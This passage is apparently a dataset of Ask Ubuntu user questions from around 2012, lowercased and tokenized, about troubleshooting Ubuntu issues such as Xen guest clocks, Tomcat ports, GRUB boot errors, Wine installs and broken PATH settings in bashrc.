to modify the indicator-session code , any update from the mainstream ubuntu repo will break it : /
195107	`` .ts `` files not recognised	i have some .ts files ( programs recorded from my sharp tv on usb stick ) that i want to store/play on my pc . however , although they are listed on the stick when its plugged in the pc nothing will recognize the files . i have tried vlc ( the `` slider '' moves but there 's no sound or video ) and changed the extension to mpeg , mp2 , etc . but no joy . i have tried converting the files with file converters and demuxers but none of these recognize the files . are the files corrupted ( they play on the tv ) or do sharp have a unique file structure ? any help would be greatly appreciated .
195110	xen keeps making the time wrong on a windows guest	just upgraded our ubuntu server to 12.04.1 lts . it runs a xen vm , which is windows server 2008 r2 x64 . we are using the xl toolchain for xen . we are in the uk , which is currently gmt+1 ( bst ) . the time is correct on the host , i.e . it knows we 're in bst . tf @ hostname : ~ $ date mon oct 1 12:16:45 bst 2012 the time on the windows guest keeps getting reset to gmt , i.e . 1 hour behind where it should be . we had this on the previous ubuntu release using the xm toolchain , which was fixed with the option localtime=1 , however xl seems to ignore the localtime option . i can not find a mechanism to either : get xen to pass local time through to the guests with the xl toolchain or get xen to leave the guest clock alone and allow ntp on the guest to keep things in sync .
195112	what 's the complement of `top -u` ?	the top -u mary command allows me to see all jobs running by user mary . what is the command to show the complement of that : all top processes except the jobs running by mary ?
195113	e-mail sent from thunderbird not opening up	i have thunderbird installed in my 12.04 version . whenever i forward any e-mail from my inbox it gets forwarded as a .eml attachment . how can i prevent this from happening , or alternatively how can i read .eml format files in mail ? ? ?
195115	nodes ca n't connect to server after bootstrap	i installed maas and i was able to add nodes and they became in ready state . i executed : juju bootstrap and then one of my nodes is waking up and i receive this message on server ( after juju status ) : and this message is shown on node after it wakes up : i am doing this several times and each time i receive the same result . i think something is wrong with my network . it look like this : internet < - > router < - > switch < - > nodes | | < -- -- - > server router is used as a dhcp server . it 's ip is 192.168.0.1 - it 's my default gateway . when i was installing maas server i installed dnsmasq and i have used as a range 192.168.0.5-192.158.0.200 and for gateway i used 192.168.0.1 and for domain i used nothing . i was able to add nodes without problems . what maybe the problem not letting nodes to connect to maas server ?
195132	creating custom tasksel recipes for preseed .	i am trying to work on automation installation . as for that i create a preseed on ubuntu 12.04 . and lucky its working perfect . but i want it more smarter . like in pre-install script i mentioned tasksel for ubuntu-desktop installation . but i want to install more packages . for that i mentioned these packages in pkgsel . but my question is that , can i add these packages ( pkgsel ) into tasksel ubuntu-desktop . so i have to make only one entry for all packages . in simple word 's , i want to know : 1 . how to create tasksel group . 2 . how to add and del package from tasksel group . any suggestion will be really helpful . thanks in advance .
195137	accidentally deleted .desktop entry , how do i recreate it ?	i was trying to create my own desktop environment and was working with sudo nautilus and i accidentally deleted .desktop entry for ubuntu 3d , help needed
195139	how to convert qcow2 virtual disk to physical machine and reversely	i have a kvm server and i am using qcow2 as vm image format i need to convert virtual machines into physical machines any helpfull idea ?
195144	how can i install visual studio ?	how can i install visual studio ? i 'd prefer to use it in wine or playonlinux if possible .
195148	how do i run `` hp support assistant '' ?	battery performance on my hp-laptop has degraded in a disastrous way . hp will only replace the battery if i give them the result from their `` hp support assistant `` software . i downloaded the software and tried to run the same with `` wine '' . neither did n't it got installed nor did it throw any exception . ubuntu software center does n't have the software , is there a way to convert the software into deb format for install on ubuntu . edit 1 : - on installing with wine , i get the following error : - ankit @ stream : ~/.wine/drive_c/swsetup/sp54620 $ wine msiinstaller.exe fixme : storage : create_storagefile storage share mode not implemented . fixme : apphelp : apphelpcheckinstallshieldpackage stub : 0x32d5fc l '' c : \\users\\public\\application data\\ { a8da1505-e615-42bb-bb77-74d5cc91fe7e } \\hp support assistant.msi '' ankit @ stream : ~/.wine/drive_c/swsetup/sp54620 $
195158	image format for screenshot	in 12.04 , can the image format for screenshot be jpeg ? i change the file name to save to to be ended with `` .jpg '' , but gnome image viewer seems not be able to open it saying error interpreting jpeg image file ( not a jpeg file : starts with 0x89 0x50 ) one example image is here http : //dl.dropbox.com/u/13029929/c1p18.jpg is it a true jpeg image file ? thanks !
195160	shutting down tomcat on port 8080	i have problem in shutting down tomcat server . when i type localhost : //8080 , it keeps on showing me tomcat homepage . i restarted the system also but did not help . i have already tried following commands and it did not show any process which might be running on port 8080 ( following commands did not output anything . ) netstat -anp|grep :8080 [ [ : blank : ] ] fuser -n tcp 8080 lsof -w -n -i tcp:8080 netstat | grep 8080 i also tried netstat -tulpn which shows following . i dont see any process running on port 8080 there . active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 0.0.0.0:17500 0.0.0.0 : * listen 2091/dropbox tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 1046/mysqld tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 7657/dnsmasq tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 901/cupsd tcp 0 0 127.0.0.1:5432 0.0.0.0 : * listen 5704/postgres tcp6 0 0 : :1:631 : : : * listen 901/cupsd udp 0 0 0.0.0.0:5353 0.0.0.0 : * 869/avahi-daemon : r udp 0 0 0.0.0.0:46045 0.0.0.0 : * 869/avahi-daemon : r udp 0 0 127.0.0.1:53 0.0.0.0 : * 7657/dnsmasq udp 0 0 0.0.0.0:17500 0.0.0.0 : * 2091/dropbox udp6 0 0 : ::51917 : : : * 869/avahi-daemon : r udp6 0 0 : ::5353 : : : * 869/avahi-daemon : r could someone please tell me how to free port 8080 . i tried to run ./shutdown of tomcat but it shoed java.net.connectexception : connection refused i guess it is because of already running instant on port8080 . thanks .
195162	mount point label randomly modified on mount	i have an external drive mounted that i want to mount at /media/storage . i used disk utility and then gparted as per https : //help.ubuntu.com/community/renameusbdrive to change the label of the drive to `` storage . '' whenever the drive mounts , however , it mounts at a location like /media/storage_x . it has also been storag_x , and i think a `` ~u '' was appended once . i really want it to be loaded explicitly at `` /media/storage '' . any suggestions ? thanks in advance for any assistance . link to gparted picture - sorry not enough rep to include it directly . https : //www.dropbox.com/s/1aykxw94785twgd/-dev-sdb % 20- % 20gparted_001.png
195163	how do i remove the tool tips on the launch bar ?	the title is the question . these tool tips stay until i try to click past them . they 're annoying since they constantly pop up and block the view of what i 'm trying to do . unfortunately i need the launch bar because ubuntu is running on vmware and the console does not allow me to use the keyboard for switching tasks ( to my knowledge ) . how do i disable them ? i 'd post an image as an example , but this site will not let me . update : unity 5.16.0 update 2 : i discovered that this may only be a problem with users who run ubuntu on a full screen vmware console that is situated on the right monitor . when the mouse is moved to the left monitor the tooltips popup and remain until the mouse is clicked twice in the vmware console window to make it active . unfortunately my problem is one involving a rare situation i think . however , i 'd love to be able to disable these tool tips if possible . it would also be nice if new features were added that can allow further customization of the launch bar .
195167	my ubuntu 12.04.1 lts freezes entire system occasionally except for mouse . what to do ?	system freezes and even seconds in clock stop . keyboard no responds only mouse pointer moves but no left nor right click . how to fix ?
195169	please one question about installing ubuntu 12.04 with windows 7	when install ubuntu12.04 alongside windows 7 as in the image but i do not know , whichever is windows and whichever is ubuntu
195179	how to run python script at login screen ?	i use a python script to set brightness to zero . # ! /usr/bin/python import dbus bus = dbus.sessionbus ( ) proxy = bus.get_object ( 'org.gnome.settingsdaemon ' , '/org/gnome/settingsdaemon/power ' ) iface = dbus.interface ( proxy , dbus_interface='org.gnome.settingsdaemon.power.screen ' ) iface.setpercentage ( 0 ) i 've put it in startup applications . it works only when i login . there is full brightness at login screen . where should i put this so that it sets brightness to zero at login screen ?
195180	user indicator configuration	in user-indicators one user could see all other user names i want to hide all names from unity indicator panel for security reasons i do n't want users to see other user names
195181	restoring windows 7 with ubuntu	there are many ubuntu-based operating systems that claim to restore windows . can ubuntu do this ? i often need to repair my multi-booting computer , or to repairs other computers .
195182	how do i tell the installer what my home directory is ?	could someone please tell me how to tell the installer what my home directory is ?
195185	installing wine with aptitude	i 'm trying to install wine on ubuntu precise . i 'm used to using aptitude for package management , so i tried to use that to install wine . when i do that , i 'm told i have to resolve dependencies that end up leaving me with 21 packages being uninstalled ! however , when i try to install with apt-get , it appears to work fine . screencast ( 2.3 mb ) : http : //www.stephenwade.me/se/au/12101.ogv what 's going on ? will it work right if i install wine through apt-get ? will it break aptitude ? why is this happening ?
195191	could i use my webcam as a barcode reader ?	one day i read an article about reading barcode using my webcam in ubuntu 12.04 by a some software which i do n't remember now . can anybody help ? what software could help me by reading a barcode using a webcam ?
195193	increasing ubuntu ( 12.04 ) partition size	i 'm running a dual-boot windows xp/ubuntu system , and i 'd like to increase the size of the ubuntu partition at the expense of the windows partition . i 've already shrunk the windows partition , creating a large unallocated space between the windows and ubuntu partitions . see screenshot below . i 'd like to move my ubuntu partition to the start of the unallocated space , and then increase its size to encompass all of the unallocated space . once i try and move it using the gparted livecd , but it tells me to expect big grub issues since i 'm moving my ubuntu partition 's start sector . what is it that i should expect , and how do i handle it ?
195194	how to enable keyboard layout indicator in gnome-shell ?	i upgraded to 12.10 beta 2 and in gnome-shell i do n't have the keyboard layout/language indicator in the top panel . i have two layouts enabled and i can switch between them . i used to have it in 12.04 and also its visible before logging in . how do i enable it in gnome-shell ?
195197	screwed up terminal after modifying bashrc	i ended up screwing up my terminal , while setting up sbt for the coursera scala course . i ca n't summon gedit ( or anything else ) anymore . i got the following error : command 'gedit ' is available in '/usr/bin/gedit' the command could not be located because '/usr/bin ' is not included in the path environment variable . also , each new instance of terminal writes these messages before any command is written : -bash : : /home/antonio/jdk7/jdk1.7.0_07/bin : no such file or directory -bash : export : `/home/antonio/desktop/scala/install/sbt/bin : /home/antonio/jdk7/jdk1.7.0_07/bin ' : not a valid identifier i recently did a manual installation of the jdk 7 , which apparently works : java -version java version `` 1.7.0_07 '' java ( tm ) se runtime environment ( build 1.7.0_07-b10 ) java hotspot ( tm ) 64-bit server vm ( build 23.3-b01 , mixed mode ) while setting up sbt , i made the mistake of editing bashrc by writing gedit ~/.bashrc on my terminal instead of writing gedit .bashrc , i wrote the following lines at the end of the bashrc file that opened : export path=/path/to/your/jdk1.7.0-version/bin : $ path export path=/home/antonio/jdk7/jdk1.7.0_07/bin : $ path what is wrong here ? how can i access my bashrc file and modify it again ?
195199	dash empy and blank software center	i 've ubuntu 12.10.1 lts x62 fresh of installation ... my dash is empty , search does n't work and applications list is empty . if i run the ubuntu software center it freeze in a blank screen . i tried with : restart reinstall of unity packages deleting ~/.local/share/zeitgeist folder other tricks found in the other askubuntu answers update : from ~/.xsession-errors i/o warning : failed to load external entity `` /home/francesco/.compiz/session/10699c9c27649d05db134910329935534100000027470033 '' initializing session options ... done ( compiz:2813 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed ** ( zeitgeist-datahub:3070 ) : warning ** : zeitgeist-datahub.vala:227 : unable to get name `` org.gnome.zeitgeist.datahub '' on the bus ! edit : deleting .cache folder solves the ubuntu software center blank screen issue , thanks to jokerdino ! !
195207	problem after the last dist-upgrade in ubuntu 12.10	i just updated my ubuntu 12.10 netbook using the command sudo apt-get dist-upgrade . the last partial-upgrade has eliminated unity ; if i try ro re-install unity from synaptic it tell me that i have problem with the dependecies in particular with `` compiz-core-abiversion-20120920 '' . i dont't really know what i have to do to re-install unity . does anybody could help me ? thanks a lot [ update ] 1 ) i tried to remove `` compiz-core-abiversion-20120920 '' but i ca n't remove virtual packages 2 ) after install and re-install compiz it 's always the same 3 ) i do n't know what i must to do ... sorry for my bad english ... .
195209	editing wired connection	i 'm not sure what is happening here , but every time i typed into my clone mac address the save box goes grey . what can i do to change this ? basically my wired network is not saving and i think this could be the reason why i 'm not getting access to ubuntu network server . second part of the question is i noticed my update is not from the secured server , what can i do to chabge this
195212	is there any alternative to magic folder for ubuntu ?	is there any alternative to magic folder for ubuntu ? or can we make a folder which will allow us to easily categorize and move files . when we drag a file to the folder it will look at the file extension and place document files ( like doc , xls , ppt , etc ) in the document folder . it places image files like ( jpeg , png , tiff , gif , etc ) into the pictures folder or move the file to the custom specified location .
195214	no external microphone acer ao722	the acer ao722 comes with an external mic input , and this input is not recognised by alsa mixer or sound ( in system settings ) . there are various comments on this problem , but no real solutions . for example external mic not working but internal mic works on an acer aspiron ao722 . using the internal mic is not an option , as i need to use skype professionally . i have tried everything in alsamixer ( accessible through the terminal ctrl+alt+t , command : alsamixer ) , and in sound ( under system settings ) . i have also installed pulseaudio . but to no avail . the headset is working normally under skype in windows . my ao722 came with windows 7 on it , so i have installed skype there too . my headset has separate connectors for ears and mic , and these go into the respective output and input on the right side of the laptop . this location : http : //bernaerts.dyndns.org/linux/202-ubuntu-acer-ao722 sounds like an effective solution but it is for ubuntu natty 11.04 . the solution suggested sounds drastic to me : replace the kernel 2.6.38-13 with version 2.6.38-12 . i use ubuntu 12.04 , and my kernel is 3.2.0-30-generic-pae . question : could i try this solution with ubuntu 12.04 ? is this a risky thing to do ? i have found harware work around this problem . the audio output seems to be a combi output with also a microphone connection . i have made an adapter for this output . i used a 4 contacts 3,5 mm audio jack plug . to this plug i have soldered 2 female ( common stereo ) connectors , one for ears and one for the mic of my headset . the 4 contacts jack , which goes into the laptop ( in audio output ) is wired as follows : tip = hot audio right ; first sleeve after tip = hot audio left ; second sleeve = common earth ( for both ears and microphone ) ; the 3rd sleeve = microphone signal input . in the connector which i could buy , the 3rd sleeve is not so much a sleeve , but part of the metal base of the connector ; normally you would expect this one to be connect to earth . but connecting the mic signal to it works . maybe ready made adapters of this kind and even headsets with a combi jack can simply be purchased ; i did n't check . when i plug in the 4 contacts jack , sound and alsamixer immediately recognise an external microphone ( even if no mic is connected to the adapter ) . in sound , under the input tab , 'settings for internal microphone ' changes into 'setting for microphone ' . the microphone comes through loud and clear , however there is a constant noise in the background . others have reported this too . if i disconnect the external mic from the adapter , or shortcircuit the external microphone , the noise gets less but does not disappear . therefore , it is not background noise from the room , but it comes from the computer itself . however , if you talk directly in the microphone of the headset , the noise level is acceptable for voip . the headset of my mobile phone nokia c1 mobile comes wwith a 4 contacts combi 3,5mm jack plug . however , this one works ( ear and mic ) with the ao722 only if not inserted fully . possibly the wiring of this headset jack is different . i can not find detailed specs of the ao722 , and do n't know whether the audio 'output ' was actually designed as a combi input/output . i have seen that at least one other ao model has a combi connector only . in any case , i do not believe that connecting your headset in this way will harm your computer . i would still appreciate a software solution . this must be possible , because the proper microphone input connector works under ms windows .
195220	after formatting windows 7 there is still dual-boot screen	i have installed windows 7 and ubuntu 11.10 on my pc and ubuntu was installed using wubi installer . today , i format my pc and installed windows 7 and after restarting the pc , there is still displayed a dual-boot ( win 7 and ubuntu ) menu , but i do not have install ubuntu . can anyone tell me what is wrong and why is there still a dual-boot screen ? how can remove this dual boot and install new version ubuntu along windows 7 ? can anyone help me with this ?
195223	uninstalling ubuntu + partitions	i have ubuntu 12.04 installed onto my dual-boot system ; how can i uninstall it ? which partition ( s ) should i delete ? as you can see , i have two used/full up 'other ' partitions and one ext4 partition . the two other partitions have the partition id : ( 0x82 ) and the ext4 partition has : ( 0x83 ) . how can i safely uninstall ubuntu , without screwing up the bootloader ) ( i found a program somewhere which can fix the windows bootloader but forgot the name )
195227	do/will webapps work in kubuntu 12.10 ?	i hear web apps have landed in 12.10 . i ca n't seem to get them to work in kubuntu 12.10 , however . will they be coming to kubuntu ? or did i just not set them up correctly ?
195232	installations : passwords do not match	installation : downloaded wubi from ubuntu site today ; therefore , i presume this is the latest version of wubi . the first screen requires a user name and password . i enter both and receive an error message : '' passwords do not match . '' the screen does not have a field to enter a 'verify ' password . i 've never had ubuntu installed on this machine . to the best of my knowledge i have no passwords for anyone stored on this machine . to what is this comparison being made and , more importantly , how do i bypass this glitch and get on with the installation ? i 'd very much appreciate any help . thank you .
195234	grub error 15 . ca n't boot at all now	installed 12.04 on clean second ( sdb ) hard drive ( windows 7 is sda ) . on first reboot i get grub error 15 and system dies . on restart system always goes to grub and now ca n't boot windows .
195235	ca n't install ubuntu on dell inspiron 5423 ultrabook	i tried to install ubuntu 12.04lts on my dell 14z inspiron 5423 i already try with live way but i ca n't make it install on right partition ps . it show only ssd .so i try alternative way by install via wubi and it install complete but when i reboot it show message that '' no root file system is defined . please correct from the partition menu '' firstly that drive is ntfs then i find some advice that it should be ext2,3,4 but when i change it format it does n't show on wubi anymore anybody have a suggestion ? ? ps.sorry for my poor english
195244	how do i install inventory management software ?	i am relatively new to ubuntu- about a year- and i have still yet to figure out how to install something that is not in the software center , nor have i figured out how to use spm for files that are not already listed . i currently run 12.04 i am trying to test run some inventory management software http : //www.inventory-management.org/ and all of the basic `` this is how you install things dummy '' articles are not yielding any results . it 's web based somehow but i have to install something ? i do n't know , i 'm just looking for a way to stop manually counting inventory on a spreadsheet every week at work . there is no .deb file that i can find to cram it in to the software center . i 'm stuck and at the end of my tiny little thread of knowledge about this process .
195246	restore pop up window in openoffice wo n't go away	i have been using openoffice for months . now when i open up the application , i get a pop up window with the message that `` the application open office quit unexpectedly while trying to restore its window . do you want to try to restore its window again ? '' when i click restore , nothing happens , when i click do n't restore , nothing happens , and i am not able to use or quit the program because the window remains . i have trashed the application and re-downloaded it , same problem .
195247	system files lockdown	i 'm thinking of reinstalling lubuntu and want to make sure that system changes are not made permanently until i choose to dump it to disk . this is so i never have to reinstall and can try programs to see if they damage anything . ( my old system was damaged by dependencies ) . p.s . i want /home to be writable without dumping
195249	how do i get emacs 24 ?	emacs24 seems to bring quite a lot of minor improvements over the last version . i know there are already ppa 's to easily install it but are there any chances that it will be backported to ubuntu 12.04 ? where should i make a request or should i make a request for this ? also does anyone know what version is shipping with 12.10 ?
195256	how do i install kernel v3.6 on ubuntu 12.04 x86_64 ?	now that v3.6 of the kernel has been released , is it available in any trusted ppas ? if not , i do n't mind compiling it on my machine itself ( i have never done it before though ) . i 'd love it if i had step-by-step instructions .
195258	problems with wifi connection after playing with aircrack	problem : from time to time my wifi connection download/upload speed goes to nearly 0 for 2-3 minutes ( pages does n't open ) and goes back to the full speed after this time . this happens for about half an hour and then everything works good for another half an hour and then it 's not working again ... it does n't happen on other computers connected to the same network and happens on 3 different networks . possible reasons : a few weeks ago i installed and played a little with aircrack . maybe , i change some mode/setting in my wlan device by accident ?
195259	can byobu ( tmux ) show a multiline status	with byobu-screen the default status line had two lines . with byobu-tmux however the default status line only has one line . i liked the seperate line with the list of windows , it let me see more than one window title in a smaller terminal window . is it possible to have a multi line status while running on tmux ?
195260	multi-page static website to pdf/chm/other converter	i have several small static websites that i want to turn into pdfs , chms , or a similar format . these websites are documentation generated by ruby 's rdoc tool . they have an index.html file and links to other static files all contained in directories up to two-levels deep . i want to be able to view these docs on my ios and android devices . neither of those devices will let me easily browse a static website so i think a better solution would be to turn these sites into a more supported format on my ubuntu desktop and then transfer them to something portable .
195265	how can i assign a custom command to a logitech m705 mouse button ?	i want mouse button 9 to run /usr/bin/chromium-browser . how can i make this happen ?
195269	install python in wine - configuring paths from winetricks ?	i am trying to install python 2.6 on wine 1.5 in ubuntu 12.04 . ( yes , i need the wine version , not the native ubuntu version ) . i have wine 1.5 running just fine . i do winetricks python26 which seems to install python26 just fine , but in the ~/.local/share/wineprefixes/python26/ directory , rather than in .wine/c_drive/ ... when i try wine python i 'm told wine : can not find l '' c : \\windows\\system32\\python.exe '' how do i tell wine to look in the location where winetricks put this file ? presumably there is a way to set python path ? my attempts i did try copying the python.exe from the ~/.local/share/wineprefixes/python26/ directory into the .wine/drive_c/system32 directory , but then simply get an error about a missing dll : err : module : import_dll library python26.dll ( which is needed by l '' c : \\windows\\system32\\python.exe '' ) not found err : module : ldrinitializethunk main exe initialization for l '' c : \\windows\\system32\\python.exe '' failed , status c0000135 but that does n't seem the right way to do this anyhow . i also tried running winecfg and adding an application , and pointing it to the python.exe file in the ~/.local/share/wineprefixes/python26/ directory , but i get the same wine : can not find l '' c : \\windows\\system32\\python.exe '' error . thanks .
195278	screen zoomed after removing external monitor	hi i am having an issue after disconnecting from an external monitor that my display is enlarged the windows run off the screen so i can open catalyst control or settings- > display to try and see what the problem is . i 'm thinking its from unplugging from my monitor but ubuntu is usually smart enough to figure that out . any one whose had a similar problem or anyone with suggestions i 'd greatly appreciate your help
195281	failing to install aptana	i am trying to install aptana on ubuntu : i extracted the files from the zip folder , i moved the aptana soft to a directory i created . i launched aptana from there , everything was right till i wanted to create a project , i have this error message : an internal error has occurred . no more handlesnative code library failed to load . ( java.lang.unsatisfiedlinkerror : /home/mbenchoufi/aptana/aptana_studio_3/plugins/com.aptana.swt.webkitbrowser.linux.x86_1.0.0.1345233987/os/linux/x86/libcefjni.so : libjpeg.so.62 : can not open shared object file : no such file or directory ) did i miss to install some packages ? can someone help ?
195286	why this tar.bz2 package does not install ?	this is what i 've tried : bapi @ ubuntu : ~/downloads $ sudo apt-get install 7zip [ sudo ] password for bapi : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package 7zip bapi @ ubuntu : ~/downloads $ cd\ > bapi @ ubuntu : ~ $ sudo apt-get install libnjb reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libnjb bapi @ ubuntu : ~ $ sudo apt-get install taglib reading package lists ... done building dependency tree reading state information ... done e : unable to locate package taglib bapi @ ubuntu : ~ $ gnu gnu : command not found bapi @ ubuntu : ~ $ clear bapi @ ubuntu : ~ $ cd download bash : cd : download : no such file or directory bapi @ ubuntu : ~ $ cd downloads bapi @ ubuntu : ~/downloads $ cd networkmanager-0.9.0 bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking whether to disable maintainer-specific portions of makefiles ... yes checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking minix/config.h usability ... no checking minix/config.h presence ... no checking for minix/config.h ... no checking whether it is safe to define __extensions__ ... yes checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking whether gcc and cc understand -c and -o together ... yes checking for g++ ... no checking for c++ ... no checking for gpp ... no checking for acc ... no checking for cc ... no checking for cxx ... no checking for cc++ ... no checking for cl.exe ... no checking for fcc ... no checking for kcc ... no checking for rcc ... no checking for xlc_r ... no checking for xlc ... no checking whether we are using the gnu c++ compiler ... no checking whether g++ accepts -g ... no checking dependency style of g++ ... none checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert i686-pc-linux-gnu file names to i686-pc-linux-gnu format ... func_convert_file_noop checking how to convert i686-pc-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no checking for ansi c header files ... ( cached ) yes checking fcntl.h usability ... yes checking fcntl.h presence ... yes checking for fcntl.h ... yes checking paths.h usability ... yes checking paths.h presence ... yes checking for paths.h ... yes checking sys/ioctl.h usability ... yes checking sys/ioctl.h presence ... yes checking for sys/ioctl.h ... yes checking sys/time.h usability ... yes checking sys/time.h presence ... yes checking for sys/time.h ... yes checking syslog.h usability ... yes checking syslog.h presence ... yes checking for syslog.h ... yes checking for unistd.h ... ( cached ) yes checking for mode_t ... yes checking for pid_t ... yes checking whether time.h and sys/time.h may both be included ... yes checking whether gcc needs -traditional ... no checking for working memcmp ... yes checking for select ... yes checking for socket ... yes checking for uname ... yes checking whether nls is requested ... yes checking for intltool > = 0.40.0 ... 0.41.1 found checking for intltool-update ... /usr/bin/intltool-update checking for intltool-merge ... /usr/bin/intltool-merge checking for intltool-extract ... /usr/bin/intltool-extract checking for xgettext ... /usr/bin/xgettext checking for msgmerge ... /usr/bin/msgmerge checking for msgfmt ... /usr/bin/msgfmt checking for gmsgfmt ... /usr/bin/msgfmt checking for perl ... /usr/bin/perl checking for perl > = 5.8.1 ... 5.10.1 checking for xml : :parser ... ok checking for msgfmt ... ( cached ) /usr/bin/msgfmt checking for gmsgfmt ... ( cached ) /usr/bin/msgfmt checking for xgettext ... ( cached ) /usr/bin/xgettext checking for msgmerge ... ( cached ) /usr/bin/msgmerge checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for shared library run path origin ... done checking for cfpreferencescopyappvalue ... no checking for cflocalecopycurrent ... no checking for gnu gettext in libc ... yes checking whether to use nls ... yes checking where the gettext function comes from ... libc checking whether byte ordering is bigendian ... no checking for /etc/redhat-release ... no checking for /etc/suse-release ... no checking for /etc/fedora-release ... no checking for /etc/gentoo-release ... no checking for /etc/debian_version ... yes checking for /etc/arch-release ... no checking for /etc/slackware-version ... no checking for /etc/frugalware-release ... no checking for /etc/mandriva-release ... no checking for /etc/pardus-release ... no checking for /etc/linexa-release ... no checking for /etc/exherbo-release ... no checking linux wireless extensions > = 18 ... no configure : error : wireless-tools or libiw development headers > = 28pre9 not installed or not functional bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ make make : *** no targets specified and no makefile found . stop . bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ sudo make install [ sudo ] password for bapi : make : *** no rule to make target `install ' . stop . bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ how can i install it ?
195291	hi . i 'm a newbie who wants to try ubuntu	as a total newbie on linux , i want to install ubuntu on my windows vista computer . dual boot . how does it work , which options should i use ? installation size ? my computer has 89 gb free . the default choice is 18 . desktop environment ? i do n't know which one to choose . the default choice is ubuntu , but what 's different about the other ones ? thanks for your reply .
195293	how to record `` stereo mix '' with vlc ?	i would like to record a stereo mix ( basically what i hear through the speakers connected to my sound card ) from vlc . however , i have n't been able to figure out exactly how to do this . under the `` video4linux '' capture device , i see the following audio devices : hw:0,0 hw:0,6 however , selecting either of those results in vlc trying to use my webcam ( not what i want at all ) in addition to the selected audio device . what do i need to do ?
195297	install oracle-java7-installer through apt-cacher-ng	i 've added the oracle-java7-installer ppa to my apt-cacher-ng server and to my clients . i can not get it to install . any ideas on how i can do this ? i think it fails when it tries to download the installation from oracle . this is what happens when i try to install it : admin @ vgjs001 : ~ $ sudo apt-get install oracle-java7-installer reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : gsfonts gsfonts-x11 java-common libfontenc1 libxfont1 x11-common xfonts-encodings xfonts-utils suggested packages : default-jre equivs binfmt-support visualvm ttf-baekmuk ttf-unfonts ttf-unfonts-core ttf-kochi-gothic ttf-sazanami-gothic ttf-kochi-mincho ttf-sazanami-mincho ttf-arphic-uming firefox firefox-2 iceweasel mozilla-firefox iceape-browser mozilla-browser epiphany-gecko epiphany-webkit epiphany-browser galeon midbrowser moblin-web-browser xulrunner xulrunner-1.9 konqueror chromium-browser midori google-chrome the following new packages will be installed : gsfonts gsfonts-x11 java-common libfontenc1 libxfont1 oracle-java7-installer x11-common xfonts-encodings xfonts-utils 0 upgraded , 9 newly installed , 0 to remove and 10 not upgraded . need to get 4 269 kb/4 347 kb of archives . after this operation , 7 548 kb of additional disk space will be used . do you want to continue [ y/n ] ? get:1 `` hyperlink-1 '' `` repo-1 '' gsfonts all 1:8.11+urwcyr1.0.7~pre44-4.2ubuntu1 [ 3 374 kb ] get:2 `` hyperlink-2 '' `` repo-2 '' libfontenc1 amd64 1:1.1.0-1 [ 15,4 kb ] get:3 `` hyperlink-3 '' `` repo-3 '' libxfont1 amd64 1:1.4.4-1 [ 133 kb ] get:4 `` hyperlink-4 '' `` repo-4 '' x11-common all 1:7.6+12ubuntu1 [ 57,7 kb ] get:5 `` hyperlink-5 '' `` repo-5 '' xfonts-encodings all 1:1.0.4-1ubuntu1 [ 583 kb ] get:6 `` hyperlink-6 '' `` repo-6 '' xfonts-utils amd64 1:7.6+1 [ 96,4 kb ] get:7 `` hyperlink-7 '' `` repo-7 '' gsfonts-x11 all 0.22 [ 9 108 